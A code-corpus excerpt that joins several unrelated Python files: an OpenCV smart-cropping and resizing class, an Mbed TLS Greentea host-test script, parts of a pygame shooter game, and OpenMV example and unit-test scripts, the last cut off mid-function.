generator = self._extract_crop_for_files_iterator(
valid_files,
crop_width,
crop_height,
num_of_crops,
filters,
down_sample_factor
)
for data in generator:
file_path = data["filepath"]
file_crops = data["crops"]
error = data["error"]
if error is None:
writer.write(file_path, file_crops)
print("Completed processing for : ", file_path)
else:
print("Error processing file : ", file_path)
print(error)
else:
print("All the files in directory %s are invalid video files" % dir_path)
def _crop_image(
self,
file_path,
crop_width,
crop_height,
num_of_crops,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops the imaged based on the specification - width and height
:param file_path: Input file path
:type file_path: str, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop heigh
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop list
:rtype: list of structure crop_rect
"""
imgFile = cv2.imread(file_path)
crop_list = self.crop_image_from_cvimage(
input_image=imgFile,
crop_width=crop_width,
crop_height=crop_height,
num_of_crops=num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor,
)
return crop_list
@FileDecorators.validate_file_path
def crop_image(
self,
file_path,
crop_width,
crop_height,
num_of_crops,
writer,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops the imaged based on the specification - width and height
:param file_path: Input file path
:type file_path: str, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop heigh
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param writer: writer object to process data
:type writer: Writer, required
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop list
:rtype: list of structure crop_rect
"""
crop_list = self._crop_image(
file_path,
crop_width,
crop_height,
num_of_crops,
filters=[],
down_sample_factor=config.Image.down_sample_factor
)
writer.write(file_path, crop_list)
@FileDecorators.validate_file_path
def crop_image_with_aspect(
self,
file_path,
crop_aspect_ratio,
num_of_crops,
writer,
filters=[],
down_sample_factor=8
):
"""smartly crops the imaged based on the aspect ratio and returns number of specified crops for each crop spec found in the image with
the specified aspect ratio
:param file_path: Input file path
:type file_path: str, required
:param crop_aspect_ratio: output crop ratio
:type crop_aspect_ratio: str (eg. '4:3')
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:param writer: writer to process the image
:type num_of_crops: Writer, required
:return: crop list
:rtype: list of structure crop_rect
"""
imgFile = cv2.imread(file_path)
image_height, image_width, _ = imgFile.shape
ratio_width, ratio_height = map(int, crop_aspect_ratio.split(":"))
crop_list = self._generate_crop_options_given_for_given_aspect_ratio(
imgFile,
image_width,
image_height,
ratio_width,
ratio_height,
num_of_crops=num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor,
)
sorted_list = sorted(crop_list, key=lambda x: float(x.score), reverse=True)
crop_list = sorted_list[:num_of_crops]
writer.write(file_path, crop_list)
#
@FileDecorators.validate_file_path
def save_crop_to_disk(self, crop_rect, frame, file_path, file_name, file_ext, rescale=False):
"""saves an in-memory crop on drive.
:param crop_rect: In-memory crop_rect.
:type crop_rect: crop_rect, required
:param frame: In-memory input image.
:type frame: numpy.ndarray, required
:param file_name: name of the image.
:type file_name: str, required
:param file_path: Folder location where files needs to be saved
:type file_path: str, required
:param file_ext: File extension indicating the file type for example - '.jpg'
:type file_ext: str, required
:return: None
"""
cropped_img = crop_rect.get_image_crop(frame)
file_full_path = os.path.join(file_path, file_name + file_ext)
cv2.imwrite(file_full_path, cropped_img)
@FileDecorators.validate_file_path
def resize_image(
self,
file_path,
target_width,
target_height,
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly resizes the image based on the specification - width and height
:param file_path: Input file path
:type file_path: str, required
:param target_width: output image width
:type target_width: int
:param target_height: output image height
:type target_height: int
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: resized image
:rtype: cv_image
"""
if not self._check_if_valid_image(file_path):
print("Error: Invalid Image, check image path: ", file_path)
return
imgFile = cv2.imread(file_path)
input_image_height, input_image_width, _ = imgFile.shape
target_image_aspect_ratio = target_width / target_height
input_image_aspect_ratio = input_image_width / input_image_height
if input_image_aspect_ratio == target_image_aspect_ratio:
target_image = cv2.resize(imgFile, (target_width, target_height))
return target_image
else:
crop_list = self._generate_crop_options_given_for_given_aspect_ratio(
imgFile,
input_image_width,
input_image_height,
target_width,
target_height,
num_of_crops=1,
filters=[],
down_sample_factor=down_sample_factor,
)
# From list of crop options sort and get best crop using crop score variables in each
# crop option
sorted_list = sorted(crop_list, key=lambda x: float(x.score), reverse=True)
# Get top crop image
resized_image = sorted_list[0].get_image_crop(imgFile)
target_image = cv2.resize(resized_image, (target_width, target_height))
return target_image
def resize_from_cvimage(
self,
cv_image,
target_width,
target_height,
down_sample_factor=config.Image.down_sample_factor
):
"""smartly resizes a cv image based on the specification - width and height
:param cv_image: Input cv_image
:type cv_image: numpy.ndarray object , required
:param target_width: output image width
:type target_width: int
:param target_height: output image height
:type target_height: int
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: resized image
:rtype: cv_image
"""
input_image_height, input_image_width, _ = cv_image.shape
target_image_aspect_ratio = target_width / target_height
input_image_aspect_ratio = input_image_width / input_image_height
if input_image_aspect_ratio == target_image_aspect_ratio:
target_image = cv2.resize(cv_image, (target_width, target_height))
return target_image
else:
crop_list = self._generate_crop_options_given_for_given_aspect_ratio(
cv_image,
input_image_width,
input_image_height,
target_width,
target_height,
num_of_crops=1,
filters=[],
down_sample_factor=down_sample_factor,
)
sorted_list = sorted(crop_list, key=lambda x: float(x.score), reverse=True)
resized_image = sorted_list[0].get_image_crop(cv_image)
target_image = cv2.resize(resized_image, (target_width, target_height))
return target_image
def _generate_crop_options_given_for_given_aspect_ratio(
self,
imgFile,
input_image_width,
input_image_height,
target_width,
target_height,
num_of_crops,
filters,
down_sample_factor,
):
""" Internal function to which for given aspect ratio (target_width/target_height)
Generates ,scores and returns list of image crops
:param imgFile: Input image
:type imgFile: opencv image
:param input_image_width: input image width
:type input_image_width: int
:param input_image_height: input image height
:type input_image_height: int
:param target_width: target aspect ratio width
:type target_width: int
:param target_height: target aspect ratio height
:type target_height: int
:param num_of_crops: number of crop needed in the end
:type num_of_crops: int
:param filters: filters
:type filters: list of filters
:param down_sample_factor: image down sample factor for optimizing processing time
:type down_sample_factor: int
:return: list of candidate crop rectangles as per input aspect ratio
:rtype: list of CropRect
"""
crop_list_tuple, crop_list = [], []
# Calculate height ratio and width ratio of input and target image
height_ratio, width_ratio = (
input_image_height / target_height,
input_image_width / target_width,
)
# Generate candidate crops, _get_crop_spec function changes it's behavior based
# on whether height_ratio is greater or smaller than width ratio.
if height_ratio <= width_ratio:
crop_list_tuple += self._get_crop_specs(
input_image_height,
input_image_width,
target_height,
target_width,
is_height_small=True,
)
else: # elif width_ratio < height_ratio:
crop_list_tuple += self._get_crop_specs(
input_image_height,
input_image_width,
target_height,
target_width,
is_height_small=False,
)
# For each of crop_specifications generated by _get_crop_spec() function
# generate actual crop as well as give score to each of these crop
for crop_height, crop_width in crop_list_tuple:
crop_list += self.crop_image_from_cvimage(
input_image=imgFile,
crop_width=crop_width,
crop_height=crop_height,
num_of_crops=num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor,
)
return crop_list
@FileDecorators.validate_dir_path
def resize_image_from_dir(
self,
dir_path,
target_width,
target_height,
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly resizes all the images (inside a directory) based on the specification - width and height
:param dir_path: Input Directory path
:type dir_path: str, required
:param target_width: output width
:type target_width: int
:param target_height: output height
:type target_height: int
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: dict with key as filepath and resized image as in opencv format as value
:rtype: dict
"""
all_resized_images = {}
for path, subdirs, files in os.walk(dir_path):
for filename in files:
filepath = os.path.join(path, filename)
image_file_path = os.path.join(path, filename)
if self._check_if_valid_image(image_file_path):
resized_image = self.resize_image(
image_file_path, target_width, target_height, down_sample_factor
)
all_resized_images[filepath] = resized_image
else:
print("Error: Not a valid image file:", image_file_path)
return all_resized_images
@FileDecorators.validate_file_path
def save_image_to_disk(self, image, file_path, file_name, file_ext):
"""saves an in-memory image obtained from image resize on drive.
:param image: In-memory input image.
:type image: numpy.ndarray, required
:param file_name: name of the image.
:type file_name: str, required
:param file_path: Folder location where files needs to be saved
:type file_path: str, required
:param file_ext: File extension indicating the file type for example - '.jpg'
:type file_ext: str, required
:return: None
"""
file_full_path = os.path.join(file_path, file_name + file_ext)
cv2.imwrite(file_full_path, image)
@FileDecorators.validate_file_path
def _check_if_valid_image(self, file_path):
"""Function to check if given image file is a valid image compatible with
opencv
:param file_path: image filename
:type file_path: str
:return: Return True if valid image file else False
:rtype: bool
"""
try:
frame = cv2.imread(file_path)
# Making sure video frame is not empty
if frame is not None:
return True
else:
return False
except cv2.error as e:
print("cv2.error:", e)
return False
except Exception as e:
print("Exception:", e)
return False
``` |
{
"source": "jiblime/mbedtls",
"score": 2
} |
#### File: tests/scripts/mbedtls_test.py
```python
import re
import os
import binascii
from mbed_host_tests import BaseHostTest, event_callback # pylint: disable=import-error
class TestDataParserError(Exception):
"""Indicates error in test data, read from .data file."""
pass
class TestDataParser(object):
"""
Parses test name, dependencies, test function name and test parameters
from the data file.
"""
def __init__(self):
"""
Constructor
"""
self.tests = []
def parse(self, data_file):
"""
Data file parser.
:param data_file: Data file path
"""
with open(data_file, 'r') as data_f:
self.__parse(data_f)
@staticmethod
def __escaped_split(inp_str, split_char):
"""
Splits inp_str on split_char except when escaped.
:param inp_str: String to split
:param split_char: Split character
:return: List of splits
"""
split_colon_fn = lambda x: re.sub(r'\\' + split_char, split_char, x)
if len(split_char) > 1:
raise ValueError('Expected split character. Found string!')
out = list(map(split_colon_fn, re.split(r'(?<!\\)' + split_char, inp_str)))
out = [x for x in out if x]
return out
def __parse(self, data_f):
"""
Parses data file using supplied file object.
:param data_f: Data file object
:return:
"""
for line in data_f:
line = line.strip()
if not line:
continue
# Read test name
name = line
# Check dependencies
dependencies = []
line = next(data_f).strip()
match = re.search('depends_on:(.*)', line)
if match:
dependencies = [int(x) for x in match.group(1).split(':')]
line = next(data_f).strip()
# Read test vectors
line = line.replace('\\n', '\n')
parts = self.__escaped_split(line, ':')
function_name = int(parts[0])
args = parts[1:]
args_count = len(args)
if args_count % 2 != 0:
err_str_fmt = "Number of test arguments({}) should be even: {}"
raise TestDataParserError(err_str_fmt.format(args_count, line))
grouped_args = [(args[i * 2], args[(i * 2) + 1])
for i in range(int(len(args)/2))]
self.tests.append((name, function_name, dependencies,
grouped_args))
def get_test_data(self):
"""
Returns test data.
"""
return self.tests
class MbedTlsTest(BaseHostTest):
"""
Host test for Mbed TLS unit tests. This script is loaded at
run time by Greentea for executing Mbed TLS test suites. Each
communication from the target is received in this object as
an event, which is then handled by the event handler method
decorated by the associated event. Ex: @event_callback('GO').
Target test sends requests for dispatching next test. It reads
tests from the intermediate data file and sends test function
identifier, dependency identifiers, expression identifiers and
the test data in binary form. Target test checks dependencies
, evaluate integer constant expressions and dispatches the test
function with received test parameters. After test function is
finished, target sends the result. This class handles the result
event and prints verdict in the form that Greentea understands.
"""
# status/error codes from suites/helpers.function
DEPENDENCY_SUPPORTED = 0
KEY_VALUE_MAPPING_FOUND = DEPENDENCY_SUPPORTED
DISPATCH_TEST_SUCCESS = DEPENDENCY_SUPPORTED
KEY_VALUE_MAPPING_NOT_FOUND = -1 # Expression Id not found.
DEPENDENCY_NOT_SUPPORTED = -2 # Dependency not supported.
DISPATCH_TEST_FN_NOT_FOUND = -3 # Test function not found.
DISPATCH_INVALID_TEST_DATA = -4 # Invalid parameter type.
DISPATCH_UNSUPPORTED_SUITE = -5 # Test suite not supported/enabled.
def __init__(self):
"""
Constructor initialises test index to 0.
"""
super(MbedTlsTest, self).__init__()
self.tests = []
self.test_index = -1
self.dep_index = 0
self.suite_passed = True
self.error_str = dict()
self.error_str[self.DEPENDENCY_SUPPORTED] = \
'DEPENDENCY_SUPPORTED'
self.error_str[self.KEY_VALUE_MAPPING_NOT_FOUND] = \
'KEY_VALUE_MAPPING_NOT_FOUND'
self.error_str[self.DEPENDENCY_NOT_SUPPORTED] = \
'DEPENDENCY_NOT_SUPPORTED'
self.error_str[self.DISPATCH_TEST_FN_NOT_FOUND] = \
'DISPATCH_TEST_FN_NOT_FOUND'
self.error_str[self.DISPATCH_INVALID_TEST_DATA] = \
'DISPATCH_INVALID_TEST_DATA'
self.error_str[self.DISPATCH_UNSUPPORTED_SUITE] = \
'DISPATCH_UNSUPPORTED_SUITE'
def setup(self):
"""
Setup hook implementation. Reads test suite data file and parses out
tests.
"""
binary_path = self.get_config_item('image_path')
script_dir = os.path.split(os.path.abspath(__file__))[0]
suite_name = os.path.splitext(os.path.basename(binary_path))[0]
data_file = ".".join((suite_name, 'datax'))
data_file = os.path.join(script_dir, '..', 'mbedtls',
suite_name, data_file)
if os.path.exists(data_file):
self.log("Running tests from %s" % data_file)
parser = TestDataParser()
parser.parse(data_file)
self.tests = parser.get_test_data()
self.print_test_info()
else:
self.log("Data file not found: %s" % data_file)
self.notify_complete(False)
def print_test_info(self):
"""
Prints test summary read by Greentea to detect test cases.
"""
self.log('{{__testcase_count;%d}}' % len(self.tests))
for name, _, _, _ in self.tests:
self.log('{{__testcase_name;%s}}' % name)
@staticmethod
def align_32bit(data_bytes):
"""
4 byte aligns input byte array.
:return:
"""
data_bytes += bytearray((4 - (len(data_bytes))) % 4)
@staticmethod
def hex_str_bytes(hex_str):
"""
Converts Hex string representation to byte array
:param hex_str: Hex in string format.
:return: Output Byte array
"""
if hex_str[0] != '"' or hex_str[len(hex_str) - 1] != '"':
raise TestDataParserError("HEX test parameter missing '\"':"
" %s" % hex_str)
hex_str = hex_str.strip('"')
if len(hex_str) % 2 != 0:
raise TestDataParserError("HEX parameter len should be mod of "
"2: %s" % hex_str)
data_bytes = binascii.unhexlify(hex_str)
return data_bytes
@staticmethod
def int32_to_big_endian_bytes(i):
"""
Coverts i to byte array in big endian format.
:param i: Input integer
:return: Output bytes array in big endian or network order
"""
data_bytes = bytearray([((i >> x) & 0xff) for x in [24, 16, 8, 0]])
return data_bytes
def test_vector_to_bytes(self, function_id, dependencies, parameters):
"""
Converts test vector into a byte array that can be sent to the target.
:param function_id: Test Function Identifier
:param dependencies: Dependency list
:param parameters: Test function input parameters
:return: Byte array and its length
"""
data_bytes = bytearray([len(dependencies)])
if dependencies:
data_bytes += bytearray(dependencies)
data_bytes += bytearray([function_id, len(parameters)])
for typ, param in parameters:
if typ == 'int' or typ == 'exp':
i = int(param, 0)
data_bytes += b'I' if typ == 'int' else b'E'
self.align_32bit(data_bytes)
data_bytes += self.int32_to_big_endian_bytes(i)
elif typ == 'char*':
param = param.strip('"')
i = len(param) + 1 # + 1 for null termination
data_bytes += b'S'
self.align_32bit(data_bytes)
data_bytes += self.int32_to_big_endian_bytes(i)
data_bytes += bytearray(param, encoding='ascii')
data_bytes += b'\0' # Null terminate
elif typ == 'hex':
binary_data = self.hex_str_bytes(param)
data_bytes += b'H'
self.align_32bit(data_bytes)
i = len(binary_data)
data_bytes += self.int32_to_big_endian_bytes(i)
data_bytes += binary_data
length = self.int32_to_big_endian_bytes(len(data_bytes))
return data_bytes, length
def run_next_test(self):
"""
Fetch next test information and execute the test.
"""
self.test_index += 1
self.dep_index = 0
if self.test_index < len(self.tests):
name, function_id, dependencies, args = self.tests[self.test_index]
self.run_test(name, function_id, dependencies, args)
else:
self.notify_complete(self.suite_passed)
def run_test(self, name, function_id, dependencies, args):
"""
Execute the test on target by sending next test information.
:param name: Test name
:param function_id: function identifier
:param dependencies: Dependencies list
:param args: test parameters
:return:
"""
self.log("Running: %s" % name)
param_bytes, length = self.test_vector_to_bytes(function_id,
dependencies, args)
self.send_kv(''.join('{:02x}'.format(x) for x in length), ''.join('{:02x}'.format(x) for x in param_bytes))
@staticmethod
def get_result(value):
"""
Converts result from string type to integer
:param value: Result code in string
:return: Integer result code. Value is from the test status
constants defined under the MbedTlsTest class.
"""
try:
return int(value)
except ValueError:
ValueError("Result should return error number. "
"Instead received %s" % value)
@event_callback('GO')
def on_go(self, _key, _value, _timestamp):
"""
Sent by the target to start first test.
:param _key: Event key
:param _value: Value. ignored
:param _timestamp: Timestamp ignored.
:return:
"""
self.run_next_test()
@event_callback("R")
def on_result(self, _key, value, _timestamp):
"""
Handle result. Prints test start, finish required by Greentea
to detect test execution.
:param _key: Event key
:param value: Value. ignored
:param _timestamp: Timestamp ignored.
:return:
"""
int_val = self.get_result(value)
name, _, _, _ = self.tests[self.test_index]
self.log('{{__testcase_start;%s}}' % name)
self.log('{{__testcase_finish;%s;%d;%d}}' % (name, int_val == 0,
int_val != 0))
if int_val != 0:
self.suite_passed = False
self.run_next_test()
@event_callback("F")
def on_failure(self, _key, value, _timestamp):
"""
Handles test execution failure. That means dependency not supported or
Test function not supported. Hence marking test as skipped.
:param _key: Event key
:param value: Value. ignored
:param _timestamp: Timestamp ignored.
:return:
"""
int_val = self.get_result(value)
if int_val in self.error_str:
err = self.error_str[int_val]
else:
err = 'Unknown error'
# For skip status, do not write {{__testcase_finish;...}}
self.log("Error: %s" % err)
self.run_next_test()
``` |
{
"source": "jibminJung/2021-2-OSSProj-PlusAlpha-9",
"score": 3
} |
#### File: 2021-2-OSSProj-PlusAlpha-9/data/Defs.py
```python
import enum
import math
from sys import version
class Images(enum.Enum):
start = "./Image/StartImage.png"
how_to_play = "./Image/howtoplay.png"
about = "./Image/AboutPage.jpg"
background_desert = "./Image/DESERT_modified_v3.jpg"
background_antarctic = "./Image/Antarctic_modified_v2.jpg"
enemy_scrophion = "./Image/scorphion1-1.png"
enemy_cactus = "./Image/Catus.png"
missile_missile2 = "./Image/MISSILE_2.png"
weapon_target_missile = "./Image/Weapon/spaceMissiles_012.png"
info_infi_1 = "./Image/Info_infi_1.png"
info_infi_2 = "./Image/Info_infi_2.png"
info_infi_3 = "./Image/Info_infi_3.png"
info_infi_4 = "./Image/Info_infi_4.png"
info_infi_5 = "./Image/Info_infi_5.png"
info_stage_1 = "./Image/Info_stage_1.png"
info_stage_2 = "./Image/Info_stage_2.png"
info_stage_3 = "./Image/Info_stage_3.png"
info_stage_4 = "./Image/Info_stage_4.png"
info_stage_5 = "./Image/Info_stage_5.png"
info_stage_6 = "./Image/Info_stage_6.png"
info_items = "./Image/Info_items.png"
info_controls = "./Image/Info_controls.jpg"
class Scales(enum.Enum):
default = (1, 1)
small = (.6, .6)
tiny = (.3, .3)
class Color(enum.Enum):
RED = (200,60,50)
BLUE = (0,60,200)
GREEN = (50,200,50)
YELLOW = (255,255,0)
WHITE = (255,255,255)
TRANSPARENT = (255,255,255,128)
GRAY = (220,220,220)
BLACK = (0,0,0)
class Default(enum.Enum):
game = {
"size": {
"x":0,
"y":0
}
}
sound = {
"sfx":{
"volume":0.2
}
}
font = "./Font/DXHanlgrumStd-Regular.otf"
character = {
"size": {
"x":100,
"y":100
},
"invincible_period": 4.0,
"missile":{
"min":1,
"max":4,
"speed":20,
"speed_inc":1
},
"max_stats":{
"power":500,
"fire_rate":0.3,
"mobility":25
}
}
item = {
"duration":10.0,
"size":{
"x":50,
"y":50
},
"sound": "./Sound/Item/speedup.wav",
"velocity":5,
"speedup":{
"spawn_rate": 0.004,
"frames":[
"./Image/Items/SpeedUp/frame-1.png",
"./Image/Items/SpeedUp/frame-2.png",
"./Image/Items/SpeedUp/frame-3.png",
"./Image/Items/SpeedUp/frame-4.png",
"./Image/Items/SpeedUp/frame-5.png",
"./Image/Items/SpeedUp/frame-1.png"
]
},
"powerup":{
"spawn_rate": 0.004,
"duration":10.0,
"frames":[
"./Image/Items/PowerUp/frame-1.png",
"./Image/Items/PowerUp/frame-2.png",
"./Image/Items/PowerUp/frame-3.png",
"./Image/Items/PowerUp/frame-4.png",
"./Image/Items/PowerUp/frame-5.png",
"./Image/Items/PowerUp/frame-1.png"
]
},
"bomb":{
"spawn_rate": 0.004,
"interval":1.0,
"power":1000,
"frames":[
"./Image/Items/Bomb/frame-1.png",
"./Image/Items/Bomb/frame-2.png",
"./Image/Items/Bomb/frame-3.png",
"./Image/Items/Bomb/frame-4.png",
"./Image/Items/Bomb/frame-5.png",
"./Image/Items/Bomb/frame-1.png"
]
},
"health":{
"spawn_rate": 0.002,
"frames":[
"./Image/Items/Health/frame-1.png",
"./Image/Items/Health/frame-2.png",
"./Image/Items/Health/frame-3.png",
"./Image/Items/Health/frame-4.png",
"./Image/Items/Health/frame-1.png"
]
},
"coin":{
"spawn_rate": 0.002,
"frames":[
"./Image/Items/Coin/frame-1.png",
"./Image/Items/Coin/frame-2.png",
"./Image/Items/Coin/frame-3.png",
"./Image/Items/Coin/frame-4.png",
"./Image/Items/Coin/frame-5.png",
"./Image/Items/Coin/frame-1.png"
]
}
}
effect = {
"speed": 0.4,
"velocity": 5,
"bomb":{
"duration": 7.0,
"size":{
"x": 500,
"y": 500
},
"frames": [
"./Image/Effects/Bomb/frame-1.png",
"./Image/Effects/Bomb/frame-2.png",
"./Image/Effects/Bomb/frame-3.png",
"./Image/Effects/Bomb/frame-4.png",
"./Image/Effects/Bomb/frame-5.png",
"./Image/Effects/Bomb/frame-6.png",
"./Image/Effects/Bomb/frame-7.png",
"./Image/Effects/Bomb/frame-8.png",
"./Image/Effects/Bomb/frame-9.png",
"./Image/Effects/Bomb/frame-10.png",
"./Image/Effects/Bomb/frame-11.png",
"./Image/Effects/Bomb/frame-12.png",
"./Image/Effects/Bomb/frame-13.png",
"./Image/Effects/Bomb/frame-14.png",
"./Image/Effects/Bomb/frame-15.png"
],
"sound": "./Sound/Weapon/explosion.wav"
},
"boom":{
"duration": 4.0,
"size":{
"x": 150,
"y": 150
},
"frames":[
"./Image/Effects/Boom/frame-1.png",
"./Image/Effects/Boom/frame-2.png",
"./Image/Effects/Boom/frame-3.png",
"./Image/Effects/Boom/frame-4.png",
"./Image/Effects/Boom/frame-5.png",
"./Image/Effects/Boom/frame-6.png",
],
"sound": "./Sound/destroyed.wav"
},
"crosshair":{
"image": "./Image/Effects/Crosshair.png",
"size": {
"x": 120,
"y": 120
},
"velocity": 5
}
}
animation = {
"blink":{
"speed":0.05,
"frame":0.2,
"duration":4.0
},
"interval":10.0,
"speed":0.5
}
about = {
"authors": [
"<NAME>",
"<NAME>",
"<NAME>",
],
"open_source": {
"IMAGES":{
"MillionthVector CC BY 4.0": "http://millionthvector.blogspot.com/p/free-sprites.html",
"You're Perfect Studio CC0 1.0":"https://opengameart.org/content/space-shoter-crosshairs",
"bevouliin.com CC0 1.0":"https://opengameart.org/content/shining-coin-shining-health-shining-power-up-sprite-sheets",
"Felis Chaus CC0 1.0":"https://opengameart.org/content/fire-explosion",
"9KeyStudio CC0 1.0":"https://opengameart.org/content/pixel-art-explosion-animation",
"Icons made by Freepik":'https://www.freepik.com',
"Flaticon":"https://www.flaticon.com/"
},
"SOUNDS":{
"MATRIXXX_ CC0 1.0": "https://freesound.org/people/MATRIXXX_/sounds/441373/",
"simoneyoh3998 CC0 1.0": "https://freesound.org/people/simoneyoh3998/sounds/500673/",
"jalastram CC BY 3.0": "https://freesound.org/people/jalastram/sounds/317769/",
"befig CC BY 3.0": "https://freesound.org/people/befig/sounds/455530/",
"Royalty Free Music from Bensound":"www.bensound.com"
},
"BASE CODE":{
"CSID-DGU/2021-1-OSSPC-MUHIRYO-4":"https://github.com/CSID-DGU/2021-1-OSSPC-MUHIRYO-4.git",
"TimurKhayrullin/Ultimate-Antivirus":"https://github.com/TimurKhayrullin/Ultimate-Antivirus"
}
}
}
class Utils():
@classmethod
def clamp(cls, val, n_min, n_max):
return max(n_min, min(val, n_max))
@classmethod
def get_distance(cls, a, b):
return math.sqrt((b["x"] - a["x"])**2 + (b["y"] - a["y"])**2)
```
#### File: 2021-2-OSSProj-PlusAlpha-9/menu/DifficultySelectMenu.py
```python
import pygame
import pygame_menu
from game.InfiniteGame import *
from pygame_menu.utils import make_surface
from menu.CharacterSelectMenu import *
class DifficultySelectMenu:
def __init__(self,screen):
# 화면 받고 화면 크기 값 받기
self.screen = screen
self.size = screen.get_size()
menu_image = pygame_menu.baseimage.BaseImage(image_path='./Image/StartImage.png',drawing_mode=pygame_menu.baseimage.IMAGE_MODE_FILL)
mytheme = pygame_menu.themes.THEME_ORANGE.copy()
mytheme.background_color = menu_image
self.menu = pygame_menu.Menu('Select Difficulty...', self.size[0], self.size[1],
theme=mytheme)
def to_menu(self):
self.menu.disable()
#메뉴 구성하고 보이기
def show(self):
#캐릭터 선택 메뉴 구성
mode = [("EASY",InfiniteGame.EasyMode()),("HARD",InfiniteGame.HardMode())]
self.mode_selector = self.menu.add.selector(
title='Difficulty :\t',
items=mode
)
self.mode_selector.add_self_to_kwargs() # Callbacks will receive widget as parameter
self.menu.add.button("Character Select ->",self.to_character_select_menu)
self.menu.add.button("BACK",self.to_menu)
self.menu.mainloop(self.screen, self.check_resize)
def to_character_select_menu(self): #캐릭터 메뉴 시작 함수
selected_mode = self.mode_selector.get_value()[0][1]
CharacterSelectMenu(self.screen,selected_mode).show()
#menu mainloop에서 매번 체크 실행
def check_resize(self):
if (self.size != self.screen.get_size()): #현재 사이즈와 저장된 사이즈 비교 후 다르면 변경
changed_screen_size = self.screen.get_size() #변경된 사이즈
ratio_screen_size = (changed_screen_size[0],changed_screen_size[0]*783/720) #y를 x에 비례적으로 계산
if(ratio_screen_size[0]<320): #최소 x길이 제한
ratio_screen_size = (494,537)
if(ratio_screen_size[1]>783): #최대 y길이 제한
ratio_screen_size = (720,783)
self.screen = pygame.display.set_mode(ratio_screen_size,
pygame.RESIZABLE)
window_size = self.screen.get_size()
new_w, new_h = 1 * window_size[0], 1 * window_size[1]
self.menu.resize(new_w, new_h)
self.menu.get_current().resize(new_w, new_h)
self.size = window_size
self.menu._current._widgets_surface = make_surface(0,0)
print(f'New menu size: {self.menu.get_size()}')
```
#### File: 2021-2-OSSProj-PlusAlpha-9/object/Effect.py
```python
import time
import pygame
from data.Defs import *
from object.Object import Object
class Effect(Object):
# 모든 효과는 해당 클래스를 상속 받음
# Attributes:
# occurred : 효과 발생 시간 (float)
# inc : 다음 애니메이션 프레임까지 지난 시간 (float)
# anim_speed : 프레임 전환 속도 (float)
def __init__(self, frames, frames_trans, size, velocity, anim_id):
super().__init__("", size, velocity, frames, frames_trans, anim_id)
self.occurred = time.time()
self.inc = 0.0
self.anim_speed = Default.effect.value["speed"]
# 화면 상에서 효과를 이동시키고 다음 애니메이션 프레임으로 전환
def move(self, game):
if (game.size[0] != self.boundary[0]) or (game.size[1] != self.boundary[1]):
self.on_resize(game)
self.y += self.velocity
self.inc += self.anim_speed
self.inc = Utils.clamp(self.inc, 0.0, self.frame_count-1)
self.current_frame = int(self.inc)
self.img = self.frames[int(self.inc)]
self.update_rect((self.x, self.y))
class Explosion(Effect):
# 폭발 효과 객체
# Attributes :
# duration : 애니메이션 지속 시간
def __init__(self, animation):
super().__init__(animation.frames, animation.frames_trans, Default.effect.value["bomb"]["size"], Default.effect.value["velocity"], "bomb_effect")
self.duration = Default.effect.value["bomb"]["duration"]
# 폭발 효과 범위 내 있는 적과 보스에게 피해를 입힘
def move(self, game):
super().move(game)
# 애니메이션이 끝나면 소멸
if int(self.inc) >= self.frame_count-1:
game.effect_list.remove(self)
else:
# 충돌하는 적을 파괴
for enemy in list(game.mobList):
if self.check_crash(enemy):
enemy.destroy(game)
game.score += 10
# 충돌하는 보스 발사체 없앰
if hasattr(game, "stage"):
if game.stage.is_boss_stage:
for bullet in game.enemyBullets:
if self.rect_collide(bullet.rect):
if bullet in game.enemyBullets:
game.enemyBullets.remove(bullet)
class Boom(Effect):
# 적 파괴 효과
def __init__(self, animation):
super().__init__(animation.frames, animation.frames_trans, Default.effect.value["boom"]["size"], Default.effect.value["velocity"], "destroy_effect")
self.duration = Default.effect.value["boom"]["duration"]
# 애니메이션이 끝나면 소멸
def move(self, game):
super().move(game)
if int(self.inc) >= self.frame_count-1:
game.effect_list.remove(self)
``` |
{
"source": "jibonaronno/OpenMV-openmv",
"score": 4
} |
#### File: examples/02-Board-Control/timer_control.py
```python
import time
from pyb import Pin, Timer
def tick(timer): # we will receive the timer object when being called
print("Timer callback")
tim = Timer(4, freq=1) # create a timer object using timer 4 - trigger at 1Hz
tim.callback(tick) # set the callback to our tick function
while (True):
time.sleep(1000)
```
#### File: unittest/script/00-rgb_to_lab.py
```python
def unittest(data_path, temp_path):
import image
lab = image.rgb_to_lab((120, 200, 120))
return (lab[0] == 76 and lab[1] == -44 and lab[2] == 34)
```
#### File: unittest/script/01-lab_to_rgb.py
```python
def unittest(data_path, temp_path):
import image
rgb = image.lab_to_rgb((76, -44, 34))
return (rgb[0] == 118 and rgb[1] == 207 and rgb[2] == 122)
```
#### File: unittest/script/09-find_blobs.py
```python
def unittest(data_path, temp_path):
import image
thresholds = [(0, 100, 56, 95, 41, 74), # generic_red_thresholds
(0, 100, -128, -22, -128, 99), # generic_green_thresholds
(0, 100, -128, 98, -128, -16)] # generic_blue_thresholds
# Load image
